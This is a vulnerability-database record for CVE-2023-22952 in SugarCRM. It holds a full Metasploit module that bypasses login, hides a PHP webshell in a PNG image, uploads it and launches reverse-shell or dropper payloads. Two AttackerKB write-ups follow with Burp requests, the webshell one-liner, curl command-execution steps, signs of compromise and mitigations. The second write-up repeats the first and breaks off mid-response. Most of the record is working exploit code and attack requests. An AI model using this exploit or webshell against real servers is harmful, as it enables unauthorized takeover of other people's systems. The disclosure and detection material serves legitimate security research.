{"packetstorm": [{"lastseen": "2023-03-10T14:49:25", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T00:00:00", "type": "packetstorm", "title": "SugarCRM 12.x Remote Code Execution / Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T00:00:00", "id": "PACKETSTORM:171320", "href": "https://packetstormsecurity.com/files/171320/SugarCRM-12.x-Remote-Code-Execution-Shell-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'securerandom' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Format::PhpPayloadPng \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)', \n'Description' => %q{ \nThis module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise, \nProfessional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and \nServe versions prior to 12.0.2. \n \nThe vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with \nembedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint \n/index.php?module=EmailTemplates&action=AttachFiles. 
Once uploaded to the server, depending on server configuration, \nthe attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and \ngaining access to the system. \n \nThis vulnerability does not require authentication because there is a missing authentication check in the \nloadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get \ndestroyed and hence the attacker can continue to send valid requests to the application. \n \nBecause of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain \naccess to the underlying operating system as the user that the web services are running as (typically www-data). \n}, \n'Author' => [ \n'Sw33t.0day', # discovery \n'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2023-22952' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ], \n[ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ], \n[ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ], \n[ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ], \n[ 'PACKETSTORM', '170346' ] \n], \n'License' => MSF_LICENSE, \n'Platform' => [ 'unix', 'linux', 'php' ], \n'Privileged' => false, \n'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ], \n'Targets' => [ \n[ \n'PHP', \n{ \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X64, ARCH_X86 ], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ], \n'DefaultOptions' => { \n'PAYLOAD' => 
'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2022-12-28', \n'DefaultOptions' => { \n'SSL' => false, \n'RPORT' => 80 \n}, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]), \nOptString.new('WEBSHELL', [ \nfalse, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', '' \n]), \nOptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0]) \n] \n) \nend \n \ndef authenticate \n# generate PHP session-id \n@phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\" \n \n# randomize user and password to obfuscate and make finger printing difficult. \nuser_name = Rex::Text.rand_name \nuser_password = Rex::Text.rand_text_alphanumeric(8..16) \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_post' => { \n'module' => 'Users', \n'action' => 'Authenticate', \n'user_name' => user_name.to_s, \n'user_password' => user_password.to_s \n} \n}) \nif res && res.code == 500 && !res.body.blank? \nreturn true \nelse \nreturn false \nend \nend \n \ndef upload_webshell \n# randomize file name and extension if option WEBSHELL is not set \nfile_ext = ['phar', 'phtml'] \nif datastore['WEBSHELL'].blank? \n@webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\" \nelse \n@webshell_name = datastore['WEBSHELL'].to_s \nend \n \n# select webshell depending on the target setting (PHP or others). 
\n@post_param = Rex::Text.rand_text_alphanumeric(1..8) \n@get_param = Rex::Text.rand_text_alphanumeric(1..8) \n \nif target['Type'] == :php \npayload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\" \nelse \npayload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\" \nend \n \n# inject PHP payload into the PLTE chunk of the PNG image \npng_webshell = inject_php_payload_png(payload, injection_method: 'PLTE') \nif png_webshell.nil? \nreturn false \nend \n \n# construct multipart form data \nform_data = Rex::MIME::Message.new \nform_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"') \nform_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"') \nform_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'), \n'cookie' => @phpsessid.to_s, \n'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\", \n'data' => form_data.to_s \n}) \nif res && res.code == 200 && !res.body.blank? 
\n# parse HTML to find the webshell name embedded in a table that indicates a successful upload \nhtml = res.get_html_document \nif html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\") \nreturn true \nelse \nreturn false \nend \nelse \nreturn false \nend \nend \n \ndef execute_php(cmd, _opts = {}) \npayload = Base64.strict_encode64(cmd) \nreturn send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_post' => { \n@post_param => payload \n} \n}) \nend \n \ndef execute_command(cmd, _opts = {}) \npayload = Base64.strict_encode64(cmd) \nphp_cmd_function = datastore['COMMAND'] \nreturn send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_get' => { \n@get_param => php_cmd_function \n}, \n'vars_post' => { \n@post_param => payload \n} \n}) \nend \n \ndef exploit \nfail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate \nfail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell \nregister_file_for_cleanup(@webshell_name.to_s) \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :php \nexecute_php(payload.encoded) \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager(linemax: 65536) \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/171320/sugarcrm_webshell_cve_2023_22952.rb.txt"}], "cisa_kev": [{"lastseen": "2023-07-23T23:26:18", "description": "Multiple SugarCRM products contain a remote code execution vulnerability in the EmailTemplates. 
Using a specially crafted request, custom PHP code can be injected through the EmailTemplates.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T00:00:00", "type": "cisa_kev", "title": "Multiple SugarCRM Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-02-02T00:00:00", "id": "CISA-KEV-CVE-2023-22952", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-08-24T08:28:36", "description": "In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.\n\n \n**Recent assessments:** \n \n**h00die-gr3y** at January 18, 2023 8:56am UTC reported:\n\nLast December, 28th 2022, a zero.day vulnerability in the SugarCRM application was [disclosed](<https://seclists.org/fulldisclosure/2022/Dec/31>) by `sw33t.0day`. 
SugarCRM is a popular CRM application that is used by thousands of customers, and the latest run of `shodan` shows more than **5600** instances active on the Internet. \nIt is fair to say that not all instances are vulnerable. There is a vast number of SugarCRM Community Edition instances amongst them that are not affected by this vulnerability.\n\nFor the vulnerable versions, please check the security advisory [sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) from the vendor.\n\nThe vulnerability in sugarCRM could allow an unauthenticated attacker to upload a malicious PNG file with embedded PHP code to the `/cache/images/` directory on the web server. Once uploaded to the server, depending on the server configuration, the attacker may be able to execute that code over the web via `HTTP` or `HTTPS`, gaining access to the system.\n\nThe vulnerability is caused by two issues in the code base of sugarCRM.\n\nThe first issue is a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`. \nAfter a failed login, the session does not get destroyed, and hence the attacker can continue to send valid requests to the application. 
\nThe burp request below shows this behavior.\n\n**Authentication request and response from a vulnerable instance**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 72\n Connection: close\n \n module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a\n \n\nResponse is a HTTP 500 message and the response says `You must specify a valid username and password.` Could be different depending on the language settings.\n \n \n HTTP/1.0 500 Server Error\n Date: Wed, 18 Jan 2023 05:54:58 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly\n Status: 500 Server Error\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Content-Length: 47\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n You must specify a valid username and password.\n \n\nAfter applying the suggested fix below from the vendor, the session information gets destroyed after a failed login and further request will fail.\n \n \n //If there was a login error, we should not allow the further code execution and destroy the session\n \n if (isset($_SESSION['login_error'])) {\n \n if ($sess->getId()) {\n \n $sess->destroy();\n \n };\n \n header('Location: ' . 
$this->getUnauthenticatedHomeUrl(true));\n \n exit();\n \n }\n \n\nBurp response after the patch, where the response says `You need to be logged in to perform this action.`\n \n \n HTTP/1.0 500 Server Error\n Date: Tue, 17 Jan 2023 07:23:56 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=cf6361a9-6222-45f4-bcfb-08d0dc88376e; path=/\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Status: 500 Server Error\n Content-Length: 49\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n You need to be logged in to perform this action.\n \n\nThe second issue is the ability to upload a malicious PNG file with embedded PHP code that can then be executed by the attacker. \nThe vulnerable endpoint is `/index.php?module=EmailTemplates&action=AttachFiles`\n\nThere is a good reference [Persistent PHP payloads in PNGs](<https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) that explains very well how to build a malicious PNG file with PHP code embedded. \nThere are several ways to hide web shell code in a PNG so that the upload of such a malicious PNG succeeds. \nIn this case, we will embed the web shell code into a so-called PLTE chunk, which stores the color palette of a PNG. \nThis PLTE chunk is a critical chunk of data that does not get compressed when a PNG is re-processed on upload, which a lot of web applications typically do nowadays.\n\nThe PLTE chunk contains from 1 to 256 palette entries, each a three-byte series of the form:\n\n> Red: 1 byte (0 = black, 255 = red) \nGreen: 1 byte (0 = black, 255 = green) \nBlue: 1 byte (0 = black, 255 = blue)\n\nUsing the PLTE chunk, we potentially have 256*3 bytes available to inject our payload into such a critical chunk, which should be more than enough. 
The only constraint being that the length of the payload must be divisible by 3.\n\nOur main objective is to keep our web shell small and keep it flexible to accommodate large payloads to avoid the restrictions 768 bytes and the length of the payload. By using a PHP payload like `<?=$_GET[0](base64_decode($_POST[1]));?>`, it will satisfy those requirements where you externalize the actual payload to be delivered to the target and can modify the PHP shell command functions during runtime such as `exec()`, `passthru()`, `shell_exec()` and `system()`. \nSee `curl` examples below.\n \n \n # echo 'ls -l' | base64 \n bHMgLWwK\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=passthru' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=system' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=shell_exec' -o -\n \n\nThe burp requests below shows a success upload of the malicious PNG with PHP code embedded at a vulnerable target followed by a successful command injection.\n\n**Malicious PNG File upload**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Length: 601\n Connection: close\n \n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"action\"\n \n AttachFiles\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"module\"\n \n EmailTemplates\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"file\"; filename=\"yohoo.phar\"\n Content-Type: image/png\n \n PNG\n \n --Garbled binary text--<?=$_GET[0](base64_decode($_POST[1]));?>--Garbled binary text--\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR--\n \n\nSuccessful response of the upload will show the file 
entry at end of the response.\n \n \n HTTP/1.1 200 OK\n Date: Wed, 18 Jan 2023 05:55:00 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Vary: Accept-Encoding\n Content-Length: 4460\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n <html lang='en_us'>\n <head>\n ---- A LOT of HTML CRAP ----\n <div id=\"main\">\n <div id=\"content\">\n <table style=\"width:100%\" id=\"contentTable\"><tr><td>\n [\"cache\\/images\\/yohoo.phar\"]\n \n\n**Command execution of `ls -l`**\n \n \n POST /cache/images/yohoo.phar?0=passthru HTTP/1.1\n Host:TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=06457e85-5a6c-4428-880a-8e5134137650\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 10\n Connection: close\n \n 1=bHMgLWwK\n \n\nRemote command execution response\n \n \n HTTP/1.1 200 OK\n Date: Mon, 16 Jan 2023 16:23:10 GMT\n Server: Apache/2.4.10 (Debian)\n Vary: Accept-Encoding\n Content-Length: 1209\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n PNG\n \n --Garbled binary text--total 76\n -rw-r--r-- 1 www-data www-data 207 Jan 16 14:38 yohoo.phar\n --Garbled binary text--\n \n\nYou can of course vary the 0 parameter with other PHP shell command functions such as `exec`, `shell_exec` or `system`.\n\n## Evidence of compromise\n\nWhen you want to check if your system is compromised, please look for unexpected files in the `/cache/images/` directory. 
The published [exploit](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) used the filename `sweet.phar` and did not clean it up. However, attackers have since varied these filenames (for example `imagefile.phar`, `meow.phar`, `rvsm.phar`, `aws.phar`) and are using files with other extensions. \nAlso be conscious of the fact that the files might have been cleaned up by the attacker to cover their tracks.\n\nOther evidence might be failed execution requests for files under the `/cache/images/` directory with the extension `php`, `phar`, `phtml`, `php7`, or any other executable extension **NOT** allowed by your web server configuration. The response codes can be found in your web server logs, such as `404` \u2013 the file was not found, or `403` \u2013 access was denied by the web server.\n\n## Mitigation\n\nPlease follow the guidelines from the vendor to patch your system [January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>), or configure additional security settings in your web server, such as preventing PHP code parsing/execution with an `.htaccess` file in the `/cache/images/` directory and/or preventing PHP code execution by updating the security settings in the `php.ini` file. Lots of security guidance is available on the Internet. \nAnother less obvious security measure to consider is to enable `SAML` authentication, which mitigates the authentication bypass issue and hence protects you against unauthenticated malicious file uploads.\n\nI have created a `Metasploit` module to test this vulnerability. A local version of this module can be found in the **References** section. 
\n[Submission](<https://github.com/rapid7/metasploit-framework/pull/17507>) to Metasploit mainstream is complete and the module is in production.\n\n## References\n\n[Full Disclosure](<https://seclists.org/fulldisclosure/2022/Dec/31>) \n[Public Exploit \u2013 Packetstorm](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) \n[Security Advisory \u2013 sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) \n[January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) \n[Encoding web shells in PNG IDAT chunks](<https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/>) \n[Persistent PHP payloads in PNGs](<https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) \n[Metasploit Development h00die-gr3y](<https://github.com/h00die-gr3y/Metasploit/blob/main/README.md>)\n\n### Credits\n\nCredit goes to `sw33t.0day`, who discovered this vulnerability.\n\n**rbowes-r7** at January 11, 2023 9:25pm UTC reported:\n\nOn December 28th, 2022, a zero-day vulnerability in the SugarCRM application was [disclosed](<https://seclists.org/fulldisclosure/2022/Dec/31>) by `sw33t.0day`. SugarCRM is a popular CRM application that is used by thousands of customers, and the latest run of `shodan` shows more than **5600** instances active on the Internet. \nIt is fair to say that not all instances are vulnerable. 
There is a fast amount of SugarCRM Community Editions amongst them that are not affected by this vulnerability.\n\nFor the vulnerable versions, please check the security advisory [sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) from the vendor.\n\nThe vulnerability in sugarCRM could allow an unauthenticated attacker to upload a malicious PNG file with embedded PHP code to the `/cache/images/` directory on the web server. Once uploaded to the server, depending on server configuration, the attacker may be able to execute that code over the web via `HTTP` or `HTTPS` gaining access to the system.\n\nThe vulnerability is caused by two issues in the code base of sugarCRM.\n\nFirst issue is a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`. \nAfter a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application. \nThe burp request below shows this behavior.\n\n**Authentication request and response from a vulnerable instance**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 72\n Connection: close\n \n module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a\n \n\nResponse is a HTTP 500 message and the response says `You must specify a valid username and password.` Could be different depending on the language settings.\n \n \n HTTP/1.0 500 Server Error\n Date: Wed, 18 Jan 2023 05:54:58 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: 
PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly\n Status: 500 Server Error\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Content-Length: 47\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n You must specify a valid username and password.\n \n\nAfter applying the suggested fix below from the vendor, the session information gets destroyed after a failed login and further request will fail.\n \n \n //If there was a login error, we should not allow the further code execution and destroy the session\n \n if (isset($_SESSION['login_error'])) {\n \n if ($sess->getId()) {\n \n $sess->destroy();\n \n };\n \n header('Location: ' . $this->getUnauthenticatedHomeUrl(true));\n \n exit();\n \n }\n \n\nBurp response after the patch, where the response says `You need to be logged in to perform this action.`\n \n \n HTTP/1.0 500 Server Error\n Date: Tue, 17 Jan 2023 07:23:56 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=cf6361a9-6222-45f4-bcfb-08d0dc88376e; path=/\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Status: 500 Server Error\n Content-Length: 49\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n You need to be logged in to perform this action.\n \n\nThe second issue is around the ability to upload of a malicious PNG file with PHP code embedded that can be executed by the attacker. 
\nThe vulnerable endpoint is `/index.php?module=EmailTemplates&action=AttachFiles`\n\nThere is a good reference [Persistent PHP payloads in PNGs](<https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) that explains very well how to build a malicious PNG file with PHP code embedded. \nThere are several ways to hide web shell code in a PNG so that the upload of such a malicious PNG succeeds. \nIn this case, we will embed the web shell code into a so-called PLTE chunk, which stores the color palette of a PNG. \nThis PLTE chunk is a critical chunk of data that does not get compressed when a PNG is re-processed on upload, which a lot of web applications typically do nowadays.\n\nThe PLTE chunk contains from 1 to 256 palette entries, each a three-byte series of the form:\n\n> Red: 1 byte (0 = black, 255 = red) \nGreen: 1 byte (0 = black, 255 = green) \nBlue: 1 byte (0 = black, 255 = blue)\n\nUsing the PLTE chunk, we potentially have 256*3 bytes available to inject our payload into such a critical chunk, which should be more than enough. The only constraint is that the length of the payload must be divisible by 3.\n\nOur main objective is to keep our web shell small and flexible enough to accommodate large payloads, so as to stay within the 768-byte limit and the payload-length constraint. A PHP payload like `<?=$_GET[0](base64_decode($_POST[1]));?>` satisfies those requirements: it externalizes the actual payload to be delivered to the target and allows the PHP shell command function to be chosen at runtime, such as `exec()`, `passthru()`, `shell_exec()` and `system()`. 
\nSee `curl` examples below.\n \n \n # echo 'ls -l' | base64 \n bHMgLWwK\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=passthru' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=system' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=shell_exec' -o -\n \n\nThe burp requests below shows a success upload of the malicious PNG with PHP code embedded at a vulnerable target followed by a successful command injection.\n\n**Malicious PNG File upload**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Length: 601\n Connection: close\n \n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"action\"\n \n AttachFiles\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"module\"\n \n EmailTemplates\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"file\"; filename=\"yohoo.phar\"\n Content-Type: image/png\n \n PNG\n \n --Garbled binary text--<?=$_GET[0](base64_decode($_POST[1]));?>--Garbled binary text--\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR--\n \n\nSuccessful response of the upload will show the file entry at end of the response.\n \n \n HTTP/1.1 200 OK\n Date: Wed, 18 Jan 2023 05:55:00 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Vary: Accept-Encoding\n Content-Length: 4460\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 
